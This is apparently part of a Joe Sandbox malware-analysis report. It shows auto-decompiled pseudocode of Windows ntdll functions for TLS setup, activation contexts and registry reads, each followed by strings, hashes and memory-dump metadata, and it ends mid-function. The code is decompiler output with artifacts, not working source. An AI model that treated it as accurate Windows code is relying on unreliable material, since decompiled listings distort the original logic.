				intOrPtr _t62;
				signed int _t83;
				intOrPtr _t87;
				intOrPtr _t95;
				intOrPtr* _t98;
				signed int _t99;
				intOrPtr _t102;
				void* _t104;
				void* _t106;

				_push("true");
				_push(0x36bbc6d0);
				E36B37BE4(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t104 - 0x2c)) =  *[fs:0x18];
				 *((intOrPtr*)(_t104 - 0x24)) =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				 *((intOrPtr*)(_t104 - 0x1c)) = 0;
				L36AE53C0(0x36bd6718);
				_t83 =  *0x36bd5c90; // 0x11
				 *(_t104 - 0x48) = _t83;
				if(_t83 == 0) {
					_t102 =  *((intOrPtr*)(_t104 - 0x2c)) + 0x2c;
					L9:
					 *((intOrPtr*)( *((intOrPtr*)(_t104 - 0x2c)) + 0x2c)) = _t102;
					asm("lock inc dword [0x36bd5c80]");
					E36AE52F0(_t83, 0x36bd6718);
					_t59 = 0;
					L10:
					 *[fs:0x0] =  *((intOrPtr*)(_t104 - 0x10));
					return _t59;
				}
				_t102 = E36B1174A(_t83);
				 *((intOrPtr*)(_t104 - 0x40)) = _t102;
				if(_t102 == 0) {
					E36AE52F0(_t83, 0x36bd6718);
					_t59 = 0xc0000017;
					goto L10;
				}
				 *((intOrPtr*)(_t104 - 0x30)) = 0x36bd33a8;
				_t62 =  *0x36bd33a8; // 0x68b2ff0
				 *((intOrPtr*)(_t104 - 0x20)) = _t62;
				while(1) {
					_t98 =  *((intOrPtr*)(_t104 - 0x20));
					if(_t98 ==  *((intOrPtr*)(_t104 - 0x30))) {
						goto L9;
					}
					 *((intOrPtr*)(_t104 - 0x44)) = _t98;
					 *((intOrPtr*)(_t104 - 0x20)) =  *_t98;
					 *((intOrPtr*)(_t104 - 0x28)) = E36B11715(_t98, _t104 - 0x34);
					_t87 =  *0x36bd5d78; // 0x0
					_t88 = _t87 + 0xc0000;
					 *(_t104 - 0x38) =  *(_t104 - 0x34);
					_t95 = E36AF5D90(_t87 + 0xc0000,  *((intOrPtr*)(_t104 - 0x24)), _t87 + 0xc0000, _t65 +  *(_t104 - 0x34) + 1);
					if(_t95 == 0) {
						 *((intOrPtr*)(_t104 - 0x1c)) = 0xc0000017;
						L13:
						E36AE52F0(_t88, 0x36bd6718);
						_t99 = 0;
						do {
							_t69 =  *((intOrPtr*)(_t102 + _t99 * 4));
							if( *((intOrPtr*)(_t102 + _t99 * 4)) != 0) {
								E36AF3BC0( *((intOrPtr*)(_t104 - 0x24)), 0,  *((intOrPtr*)(_t69 - 4)));
							}
							_t99 = _t99 + 1;
						} while (_t99 <  *(_t104 - 0x48));
						_t42 = _t102 - 8; // -8
						E36AF3BC0( *((intOrPtr*)(_t104 - 0x24)), 0, _t42);
						_t59 =  *((intOrPtr*)(_t104 - 0x1c));
						goto L10;
					}
					_t88 =  *(_t104 - 0x38) + 0x00000001 + _t95 &  !( *(_t104 - 0x38));
					 *((intOrPtr*)(_t88 - 4)) = _t95;
					_t21 = _t98 + 0x24; // 0x774633c8
					 *(_t102 +  *_t21 * 4) = _t88;
					 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
					E36B288C0(_t88,  *((intOrPtr*)(_t98 + 8)),  *((intOrPtr*)(_t104 - 0x28)));
					_t106 = _t106 + 0xc;
					 *(_t104 - 4) = 0xfffffffe;
					if( *((intOrPtr*)(_t104 - 0x1c)) < 0) {
						goto L13;
					}
					if(( *0x36bd37c0 & 0x00000005) != 0) {
						_t45 = _t98 + 0x24; // 0x774633c8
						_t83 =  *_t45;
						_push( *((intOrPtr*)(_t102 + _t83 * 4)));
						_push( *((intOrPtr*)(_t98 + 8)));
						_t49 = _t98 + 0xc; // 0x0
						_push( *_t49 -  *((intOrPtr*)(_t98 + 8)));
						_push(_t83);
						E36B5E692("minkernel\\ntdll\\ldrtls.c", 0x369, "LdrpAllocateTls", 2, "TlsVector %p Index %d : %d bytes copied from %p to %p\n", _t102);
						_t106 = _t106 + 0x28;
					}
				}
				goto L9;
			}

0x36b115ef
0x36b115f1
0x36b115f6
0x36b11601
0x36b1160d
0x36b11612
0x36b1161b
0x36b11620
0x36b11626
0x36b1162b
0x36b116ed
0x36b116f0
0x36b116f3
0x36b116f6
0x36b116fe
0x36b11703
0x36b11705
0x36b11708
0x36b11714
0x36b11714
0x36b11636
0x36b11638
0x36b1163d
0x36b518ae
0x36b518b3
0x00000000
0x36b518b3
0x36b11643
0x36b1164a
0x36b1164f
0x36b11652
0x36b11652
0x36b11658
0x00000000
0x00000000
0x36b1165e
0x36b11665
0x36b11672
0x36b11675
0x36b1167b
0x36b11684
0x36b11694
0x36b11698
0x36b518bd
0x36b518c4
0x36b518c5
0x36b518ca
0x36b518cc
0x36b518cc
0x36b518d1
0x36b518db
0x36b518db
0x36b518e0
0x36b518e1
0x36b518e6
0x36b518ef
0x36b518f4
0x00000000
0x36b518f4
0x36b116a8
0x36b116aa
0x36b116ad
0x36b116b0
0x36b116b3
0x36b116be
0x36b116c3
0x36b116c6
0x36b116d2
0x00000000
0x00000000
0x36b116df
0x36b51931
0x36b51931
0x36b51934
0x36b51937
0x36b5193a
0x36b51940
0x36b51941
0x36b51959
0x36b5195e
0x36b5195e
0x36b116df
0x00000000

Strings

TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 36B51943
minkernel\ntdll\ldrtls.c, xrefs: 36B51954
LdrpAllocateTls, xrefs: 36B5194A

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID:
String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
API String ID: 0-4274184382
Opcode ID: 610262fda28012d478f510796478bf9b018993848317b7a318ec2257a9435038
Instruction ID: 16c5bf7a790c3dc1c8723623f6d9bb581e445cb10ac91087735547722590ed1b
Opcode Fuzzy Hash: 610262fda28012d478f510796478bf9b018993848317b7a318ec2257a9435038
Instruction Fuzzy Hash: 374169B5E00609AFDB14CFA9CD50AAEBBB5FF48304F058129E905BB251DB35A801CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 36B132C0 Relevance: 3.9, Strings: 3, Instructions: 111
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E36B132C0(void* __ebx, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24) {
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t32;
				signed int _t42;
				int _t50;
				int _t51;
				signed int _t52;
				void* _t55;
				signed int _t58;
				signed int* _t59;
				signed int _t63;
				void* _t67;
				intOrPtr* _t72;
				void* _t77;
				void* _t78;
				void* _t79;
				void* _t96;

				_t55 = __ebx;
				_t32 = _a8;
				_t72 = 0;
				if(_t32 == "Actx ") {
					E36B6EF10(0x33, 0, "SXS: %s() passed the empty activation context data\n", "RtlCreateActivationContext");
					_t79 = 0xc000000d;
					L13:
					return _t79;
				}
				_t59 = _a24;
				if(_t59 != 0) {
					 *_t59 =  *_t59 & 0;
				}
				_push(_t55);
				if(_a4 != _t72 || _t32 == 0) {
					L17:
					_t79 = 0xc000000d;
					goto L18;
				} else {
					_t57 = _a12;
					if(_a12 > 0x10000 || _t59 == 0) {
						goto L17;
					} else {
						_t79 = E36B1341D(_t32, _t59);
						if(_t79 < 0) {
							L12:
							goto L13;
						}
						_t72 = E36AF5D90(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57 + 0x130);
						if(_t72 == 0) {
							_t79 = 0xc0000017;
							goto L12;
						}
						_t60 = _a8;
						_t58 = _t72 + 4;
						 *_t72 = 0x674d6341;
						_push("true");
						_pop(_t42);
						asm("sbb eax, eax");
						_t79 = E36B133D0(_t58 + 0x5c,  *((intOrPtr*)( *((intOrPtr*)(_a8 + 0x18)) + _t60 + 8)),  !_t42 & _t58 + 0x00000068);
						if(_t79 < 0) {
							L18:
							__eflags = _t72;
							if(_t72 != 0) {
								E36AF3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t72);
							}
							goto L12;
						}
						 *(_t58 + 4) =  *(_t58 + 4) & 0x00000000;
						 *((intOrPtr*)(_t58 + 0x10)) = _a8;
						 *((intOrPtr*)(_t58 + 0x14)) = _a16;
						_push("true");
						 *((intOrPtr*)(_t58 + 0x18)) = _a20;
						_pop(_t63);
						 *_t58 = 1;
						_t50 = memset(_t58 + 0x1c, 0, _t63 << 2);
						_push("true");
						_t51 = memset(_t58 + 0x3c, _t50, 0 << 2);
						_push("true");
						_t77 = _t58 + 0xec;
						_pop(_t67);
						_t52 = memset(_t77, _t51, 0 << 2);
						_t78 = _t77 + _t67;
						 *(_t58 + 0xe8) =  *(_t58 + 0xe8) & _t52;
						_t96 =  *0x36bd6911 - _t52; // 0x0
						if(_t96 != 0) {
							E36B6DB2A(_t58, _t58, _t78, _t79, __eflags);
						}
						_t79 = 0;
						 *_a24 = _t58;
						goto L12;
					}
				}
			}

0x36b132c0
0x36b132c5
0x36b132ca
0x36b132d1
0x36b52811
0x36b52819
0x36b133c0
0x36b133c4
0x36b133c4
0x36b132d7
0x36b132dc
0x36b132de
0x36b132de
0x36b132e0
0x36b132e4
0x36b5282d
0x36b5282d
0x00000000
0x36b132f2
0x36b132f2
0x36b132fb
0x00000000
0x36b13309
0x36b13311
0x36b13315
0x36b133be
0x00000000
0x36b133be
0x36b13332
0x36b13336
0x36b52823
0x00000000
0x36b52823
0x36b1333c
0x36b1333f
0x36b13342
0x36b13348
0x36b13354
0x36b13357
0x36b13366
0x36b1336a
0x36b52832
0x36b52832
0x36b52834
0x36b52846
0x36b52846
0x00000000
0x36b52834
0x36b13376
0x36b1337a
0x36b13380
0x36b13386
0x36b13388
0x36b1338d
0x36b1338e
0x36b13394
0x36b13396
0x36b1339c
0x36b1339e
0x36b133a0
0x36b133a6
0x36b133a7
0x36b133a7
0x36b133a9
0x36b133af
0x36b133b5
0x36b133c9
0x36b133c9
0x36b133ba
0x36b133bc
0x00000000
0x36b133bc
0x36b132fb

Strings

RtlCreateActivationContext, xrefs: 36B52803
SXS: %s() passed the empty activation context data, xrefs: 36B52808
Actx , xrefs: 36B132CC

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID:
String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
API String ID: 0-859632880
Opcode ID: cc7b22521da76367147df00072e93f6fb994b6906f3a89aec95f2d1658779c86
Instruction ID: 52d24bb4fff4c1a65cc3aca874bc3afcf521d636b2561b7141b618a79a0a4daa
Opcode Fuzzy Hash: cc7b22521da76367147df00072e93f6fb994b6906f3a89aec95f2d1658779c86
Instruction Fuzzy Hash: DA313F72A00315AFEB16CF69E890F9A37A4EF04714F124469EE049F285EB75D806CFE1

Uniqueness

Uniqueness Score: -1.00%

Function 36B6B214 Relevance: 3.9, Strings: 3, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E36B6B214(void* __ecx) {
				char _v8;
				char _v12;
				short _v14;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				intOrPtr _v32;
				char* _v36;
				char _v40;
				char _v44;
				intOrPtr _v576;
				char _v580;
				intOrPtr _t44;
				intOrPtr _t46;
				intOrPtr* _t61;
				void* _t64;
				short _t65;
				void* _t66;
				intOrPtr* _t67;

				_t66 = __ecx;
				_v8 = 0;
				E36B28F40( &_v580, 0, 0x214);
				_v20 = 0;
				_v16 = 0;
				_v12 = 0;
				_push(0);
				_push(0x210);
				_push( &_v580);
				_push(0x2b);
				_push(_t66);
				if((E36B22B20() & 0xc0000000) == 0xc0000000) {
					L9:
					if(_v8 != 0) {
						_push(_v8);
						E36B22A80();
						_v8 = 0;
					}
					_t38 = _v12;
					if(_v12 != 0) {
						E36AF3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t38);
					}
					return _v20;
				}
				_t67 = E36B6B39F(_v576);
				if(_t67 == 0) {
					goto L9;
				} else {
					_t61 = _t67;
					_t8 = _t61 + 2; // 0x2
					_t64 = _t8;
					goto L3;
					L3:
					_t44 =  *_t61;
					_t61 = _t61 + 2;
					if(_t44 != 0) {
						goto L3;
					} else {
						_t63 = _t61 - _t64 >> 1;
						_t65 = 0xc2 + (_t61 - _t64 >> 1) * 2;
						_t46 = E36AF5D90(_t61 - _t64 >> 1,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t65);
						_v12 = _t46;
						if(_t46 != 0) {
							_v14 = _t65;
							if(E36AEFE40(_t63,  &_v16, L"\\Registry\\Machine\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\") >= 0 && E36AEFE40(_t63,  &_v16, _t67) >= 0) {
								_v44 = 0x18;
								_v36 =  &_v16;
								_push( &_v44);
								_push("true");
								_v40 = 0;
								_push( &_v8);
								_v32 = 0x40;
								_v28 = 0;
								_v24 = 0;
								if(E36B22AB0() >= 0) {
									E36AD6CC0(_v8, L"GlobalFlag", "true",  &_v20, "true", 0);
								}
							}
						}
						goto L9;
					}
				}
			}

0x36b6b231
0x36b6b233
0x36b6b236
0x36b6b23e
0x36b6b247
0x36b6b24a
0x36b6b24d
0x36b6b24e
0x36b6b253
0x36b6b254
0x36b6b256
0x36b6b265
0x36b6b31c
0x36b6b31f
0x36b6b321
0x36b6b324
0x36b6b329
0x36b6b329
0x36b6b32c
0x36b6b331
0x36b6b33e
0x36b6b33e
0x36b6b34a
0x36b6b34a
0x36b6b276
0x36b6b27a
0x00000000
0x36b6b280
0x36b6b280
0x36b6b282
0x36b6b282
0x36b6b282
0x36b6b285
0x36b6b285
0x36b6b288
0x36b6b28e
0x00000000
0x36b6b290
0x36b6b298
0x36b6b29a
0x36b6b2a6
0x36b6b2ab
0x36b6b2b0
0x36b6b2ba
0x36b6b2c6
0x36b6b2d9
0x36b6b2e0
0x36b6b2e6
0x36b6b2e7
0x36b6b2ec
0x36b6b2ef
0x36b6b2f0
0x36b6b2f7
0x36b6b2fa
0x36b6b304
0x36b6b317
0x36b6b317
0x36b6b304
0x36b6b2c6
0x00000000
0x36b6b2b0
0x36b6b28e

Strings

@, xrefs: 36B6B2F0
\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 36B6B2B2
GlobalFlag, xrefs: 36B6B30F

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID:
String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
API String ID: 0-4192008846
Opcode ID: 662e5589261f42658497675b939448af0d97d43f5261c1913e99880678f69e33
Instruction ID: e593221e271100560ee01ce76ed232a817dd95a0f716e482e0a37117c0d6292a
Opcode Fuzzy Hash: 662e5589261f42658497675b939448af0d97d43f5261c1913e99880678f69e33
Instruction Fuzzy Hash: C2314AB1E00219AFDB10DFA6CC80AEEBBBCEB44344F400469AA05AB140D6349E04CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 36B11527 Relevance: 3.8, Strings: 3, Instructions: 98
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E36B11527(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t17;
				intOrPtr _t19;
				signed int _t25;
				signed int _t28;
				intOrPtr _t35;
				signed int _t39;
				signed int _t41;
				signed int _t43;
				void* _t45;
				signed int _t51;

				_t32 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_push(_t28);
				_t43 =  *0x36bd5d8c; // 0x68b2ce0
				_push(_t39);
				if(_t43 == 0x36bd5d8c) {
					L5:
					 *0x36bd5c90 =  *0x36bd5c90 & 0x00000000;
					 *0x36bd5c94 =  *0x36bd5c94 & 0x00000000;
					_t51 =  *0x36bd5c94;
					L6:
					_t17 = E36B115EF(_t28, _t39, _t43, _t51);
					L7:
					return _t17;
				}
				_t28 = 1;
				do {
					_t39 = _t43;
					_t43 =  *_t43;
					_t4 = _t39 + 0x18; // 0x400000
					_t19 = E36AEDE20(_t32, 1,  *_t4, _t28, 9,  &_v12);
					_v12 = _t19;
					if(_t19 != 0) {
						__eflags =  *0x36bd37c0 & 0x00000005;
						if(__eflags != 0) {
							_push(_t19);
							_t12 = _t39 + 0x24; // 0x68b2d04
							E36B5E692("minkernel\\ntdll\\ldrtls.c", 0x241, "LdrpInitializeTls", 2, "DLL \"%wZ\" has TLS information at %p\n", _t12);
							_t19 = _v12;
							_t45 = _t45 + 0x1c;
						}
						_push(0);
						_push(0);
						_push( &_v8);
						_t32 = _t19;
						_t17 = E36B11796(_t28, _t19, _t39, _t39, _t43, __eflags);
						__eflags = _t17;
						if(__eflags < 0) {
							goto L7;
						}
						 *((short*)(_t39 + 0x3a)) = 0xffff;
					}
				} while (_t43 != 0x36bd5d8c);
				_t43 = _v8;
				if(_t43 != 0) {
					_t41 = _t43 + 8;
					__eflags = _t41 - 0x20;
					if(_t41 > 0x20) {
						_t35 =  *0x36bd5d78; // 0x0
						_t14 = _t43 + 0x27; // 0x27
						_t28 = _t14 >> 5;
						_t25 = E36AF5D90(_t35 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, _t28 << 2);
						__eflags = _t25;
						if(_t25 != 0) {
							_t43 = _v8;
							L13:
							 *0x36bd5c90 = _t41;
							_t39 = 0x36bd5c90;
							 *0x36bd5c98 = _t28;
							 *0x36bd5c94 = _t25;
							E36B11AD0(0x36bd5c90, 0, _t43);
							E36B11B10(0x36bd5c90, _t43, "true");
							goto L6;
						}
						_t17 = 0xc0000017;
						goto L7;
					}
					_t25 = 0x36bd5c88;
					goto L13;
				}
				goto L5;
			}

0x36b11527
0x36b1152c
0x36b1152d
0x36b1152e
0x36b11532
0x36b11534
0x36b1153a
0x36b11541
0x36b1156f
0x36b1156f
0x36b11576
0x36b11576
0x36b1157d
0x36b1157d
0x36b11582
0x36b11586
0x36b11586
0x36b11545
0x36b11546
0x36b11549
0x36b1154b
0x36b11551
0x36b11554
0x36b11559
0x36b1155e
0x36b11587
0x36b1158e
0x36b51845
0x36b51846
0x36b51860
0x36b51865
0x36b51868
0x36b51868
0x36b11594
0x36b11596
0x36b1159d
0x36b1159e
0x36b115a0
0x36b115a5
0x36b115a7
0x00000000
0x00000000
0x36b115ae
0x36b115ae
0x36b11560
0x36b11568
0x36b1156d
0x36b115b4
0x36b115b7
0x36b115ba
0x36b51870
0x36b51876
0x36b51879
0x36b51892
0x36b51897
0x36b51899
0x36b518a5
0x36b115c5
0x36b115c6
0x36b115cc
0x36b115d4
0x36b115da
0x36b115df
0x36b115e8
0x00000000
0x36b115e8
0x36b5189b
0x00000000
0x36b5189b
0x36b115c0
0x00000000
0x36b115c0
0x00000000

Strings

DLL "%wZ" has TLS information at %p, xrefs: 36B5184A
minkernel\ntdll\ldrtls.c, xrefs: 36B5185B
LdrpInitializeTls, xrefs: 36B51851

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID:
String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
API String ID: 0-931879808
Opcode ID: 16a46b1d9a5fbc653495cdcedaa395062db0db656ca07ad643a8db9eb5404c02
Instruction ID: 335c2693f3221d761cfdfee0e25cfe7e8fb5fd5b4558981309b9e0ee04dbf4a7
Opcode Fuzzy Hash: 16a46b1d9a5fbc653495cdcedaa395062db0db656ca07ad643a8db9eb5404c02
Instruction Fuzzy Hash: 8031B172E10214BBE7108F59CC95F9A7EB9EB40399F150159E702BB180EB74AD45CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 36B21190 Relevance: 3.8, Strings: 3, Instructions: 97
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E36B21190(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, signed int _a8) {
				signed int _v8;
				char _v12;
				char _v20;
				char _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char* _v44;
				intOrPtr _v48;
				char _v52;
				signed int _t38;
				signed int _t39;
				void* _t55;
				void* _t61;
				void* _t62;
				signed int _t63;
				void* _t65;
				signed int _t70;

				_t55 = __edx;
				E36B25050(__ecx,  &_v20, __ecx);
				_v52 = 0x18;
				_v44 =  &_v20;
				_v48 = 0;
				_push( &_v52);
				_push(0x20019);
				_v40 = 0x40;
				_push( &_v12);
				_v36 = 0;
				_v32 = 0;
				_t62 = E36B22AB0();
				if(_t62 < 0) {
					L9:
					return _t62;
				}
				_t38 = _a8;
				_t63 = 2;
				_t39 = _t38 * _t63;
				_t70 = _t38 * _t63 >> 0x20;
				if(_t70 < 0 || _t70 <= 0 && _t39 <= 0xffffffff) {
					_v8 = _t39;
					_push( &_v8);
					_push("true");
					_pop(_t61);
					_t58 = _t39;
					if(E36B1457E(_t39, _t61) < 0) {
						goto L13;
					}
					_t65 = E36AF5D90(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), "true", _v8);
					if(_t65 == 0) {
						_t62 = 0xc0000017;
					} else {
						E36B25050(_t58,  &_v28, _t55);
						_push( &_a8);
						_push(_v8);
						_push(_t65);
						_push(_t63);
						_push( &_v28);
						_push(_v12);
						_t62 = E36B22B00();
						if(_t62 >= 0) {
							E36B288C0(_a4, _t65 + 0xc,  *((intOrPtr*)(_t65 + 8)));
						}
						E36AF3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t65);
					}
					_push(_v12);
					E36B22A80();
					goto L9;
				} else {
					L13:
					_push(_v12);
					E36B22A80();
					return 0xc0000095;
				}
			}

0x36b2119f
0x36b211a2
0x36b211aa
0x36b211b1
0x36b211b9
0x36b211bc
0x36b211bd
0x36b211c5
0x36b211cc
0x36b211cd
0x36b211d0
0x36b211d8
0x36b211dc
0x36b2126d
0x00000000
0x36b2126d
0x36b211e2
0x36b211e7
0x36b211e8
0x36b211ea
0x36b211ec
0x36b21200
0x36b21203
0x36b21204
0x36b21206
0x36b21207
0x36b21210
0x00000000
0x00000000
0x36b21229
0x36b2122d
0x36b2128a
0x36b2122f
0x36b21234
0x36b2123c
0x36b2123d
0x36b21243
0x36b21244
0x36b21245
0x36b21246
0x36b2124e
0x36b21252
0x36b21280
0x36b21285
0x36b21260
0x36b21260
0x36b21265
0x36b21268
0x00000000
0x36b59a99
0x36b59a99
0x36b59a99
0x36b59a9c
0x00000000
0x36b59aa1

Strings

\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 36B2119B
@, xrefs: 36B211C5
BuildLabEx, xrefs: 36B2122F

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID:
String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
API String ID: 0-3051831665
Opcode ID: 760b537d3be61d34daff739933b3035096550dba3921f427743609871724948b
Instruction ID: f0a554c631157011ce0f9c24207df95e4cc814d54a33e56cbf4cbc6ca603a177
Opcode Fuzzy Hash: 760b537d3be61d34daff739933b3035096550dba3921f427743609871724948b
Instruction Fuzzy Hash: 0D317EB2900619BFDB11DBA5CC44EEEBBB9EB85754F014025FA08E7260E730DA05CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 36B685AA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 17%

			E36B685AA(intOrPtr* __ecx) {
				intOrPtr _t9;
				intOrPtr* _t17;
				intOrPtr* _t22;
				intOrPtr* _t23;

				_t9 =  *[fs:0x30];
				_t23 = __ecx;
				if(( *(_t9 + 0x68) & 0x00000100) == 0 ||  *0x36bd9231 == 0) {
					return _t9;
				} else {
					E36AEFED0(0x36bd5220);
					if(E36B69174( *((intOrPtr*)(_t23 + 0x18))) == 0) {
						_t20 = _t23;
						if(E36B68E06(_t23) < 0) {
							L9:
							_push(0x36bd5220);
							return E36AEE740(_t20);
						}
						_t22 =  *0x36bd5240; // 0x0
						while(_t22 != 0x36bd5240) {
							_t17 =  *((intOrPtr*)(_t22 + 0x1c));
							_t22 =  *_t22;
							if(_t17 != 0) {
								_t20 = _t17;
								 *0x36bd91e0( *((intOrPtr*)(_t23 + 0x30)),  *((intOrPtr*)(_t23 + 0x18)),  *((intOrPtr*)(_t23 + 0x20)), _t23);
								 *_t17();
							}
						}
						goto L9;
					}
					E36ADB910("AVRF: AVrfDllUnloadNotification called for a provider (%p) \n", _t23);
					_pop(_t20);
					asm("int3");
					goto L9;
				}
			}

0x36b685aa
0x36b685ba
0x36b685bc
0x36b68632
0x36b685c7
0x36b685cc
0x36b685db
0x36b685ed
0x36b685f6
0x36b68625
0x36b68625
0x00000000
0x36b6862a
0x36b685f8
0x36b6861d
0x36b68600
0x36b68603
0x36b68607
0x36b6860d
0x36b68615
0x36b6861b
0x36b6861b
0x36b68607
0x00000000
0x36b6861d
0x36b685e3
0x36b685e9
0x36b685ea
0x00000000
0x36b685ea

Strings

AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 36B685DE

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID:
String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
API String ID: 0-702105204
Opcode ID: 31f12f7b729ab931eb3799e0ee881ec5f39d780e77eabbc3898f49d0a7c2a8f3
Instruction ID: 91507c145f006a3b46a79fedda9805c626c76edc7625697fc05c40d26f68027d
Opcode Fuzzy Hash: 31f12f7b729ab931eb3799e0ee881ec5f39d780e77eabbc3898f49d0a7c2a8f3
Instruction Fuzzy Hash: 8B012636A20225ABE7215E23DD54E567BB6FF4129CF401468EA015F452CB24A885CFB5

Uniqueness

Uniqueness Score: -1.00%

Function 36AE7623 Relevance: 3.2, APIs: 2, Instructions: 179
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E36AE7623(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char* _t69;
				intOrPtr _t71;
				intOrPtr _t74;
				intOrPtr _t75;
				signed int _t81;
				signed int _t82;
				signed int _t89;
				signed int _t90;
				void* _t97;
				intOrPtr _t99;
				intOrPtr _t101;
				intOrPtr _t113;
				intOrPtr _t119;
				intOrPtr _t120;
				intOrPtr _t130;
				intOrPtr _t132;
				signed int _t133;
				signed int _t135;
				intOrPtr _t138;
				intOrPtr _t141;
				intOrPtr _t142;
				intOrPtr _t143;
				intOrPtr _t144;
				intOrPtr _t145;
				intOrPtr _t146;
				void* _t160;

				_t145 = __edx;
				_t138 = __ecx;
				_v32 = __edx;
				_v28 = __ecx;
				if(E36AF3C40() != 0) {
					_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				} else {
					_t69 = 0x7ffe0386;
				}
				if( *_t69 != 0) {
					E36BB4F7C(((0 | _a4 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + _t145, _t138);
				}
				goto L3;
				do {
					do {
						L3:
						_t71 =  *0x36bd67f0; // 0x0
						_t130 =  *0x36bd67f4; // 0x0
						_v20 = _t71;
						_v8 = _t130;
						_v16 =  *0x7FFE03B4;
						_v12 =  *0x7ffe03b0;
						while(1) {
